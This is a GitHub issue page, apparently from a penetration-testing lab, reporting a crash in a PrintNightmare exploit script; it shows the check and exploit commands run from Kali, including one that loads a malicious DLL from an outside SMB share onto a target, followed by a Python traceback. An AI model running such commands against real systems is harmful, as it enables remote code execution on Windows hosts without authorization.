We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Tested against a known vulnerable host. All the necessary dependencies in place.
──(kali㉿Kali1)-[~/…/Tools/Windows/PrintNightmare/PrintNightmare] └─$ python ./printnightmare.py -check 'offsec:[email protected]' 1 ⨯ Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target appears to be vulnerable!
┌──(kali㉿Kali1)-[~/…/Tools/Windows/PrintNightmare/PrintNightmare] └─$ python ./printnightmare.py -dll '\192.168.119.215\share\Print_Mal.dll' 'offsec:[email protected]' 1 ⨯ Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Enumerating printer drivers Traceback (most recent call last): File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 760, in print_nightmare.exploit(options.name, options.env, options.path, options.dll) File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 466, in exploit driver_path = self.getDriverPath(dce, environment) File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 370, in getDriverPath drivers = self.list(environment, dce) File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 389, in list resp = hRpcEnumPrinterDrivers(dce, NULL, environment, 2) File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 264, in hRpcEnumPrinterDrivers request["pDrivers"] = b"\0" * bytesNeeded UnboundLocalError: local variable 'bytesNeeded' referenced before assignment
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Tested against a known vulnerable host. All the necessary dependencies in place.
──(kali㉿Kali1)-[~/…/Tools/Windows/PrintNightmare/PrintNightmare]
└─$ python ./printnightmare.py -check 'offsec:[email protected]' 1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target appears to be vulnerable!
┌──(kali㉿Kali1)-[~/…/Tools/Windows/PrintNightmare/PrintNightmare]
└─$ python ./printnightmare.py -dll '\192.168.119.215\share\Print_Mal.dll' 'offsec:[email protected]' 1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Enumerating printer drivers
Traceback (most recent call last):
File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 760, in
print_nightmare.exploit(options.name, options.env, options.path, options.dll)
File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 466, in exploit
driver_path = self.getDriverPath(dce, environment)
File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 370, in getDriverPath
drivers = self.list(environment, dce)
File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 389, in list
resp = hRpcEnumPrinterDrivers(dce, NULL, environment, 2)
File "/home/kali/Documents/Tools/Windows/PrintNightmare/PrintNightmare/./printnightmare.py", line 264, in hRpcEnumPrinterDrivers
request["pDrivers"] = b"\0" * bytesNeeded
UnboundLocalError: local variable 'bytesNeeded' referenced before assignment
The text was updated successfully, but these errors were encountered: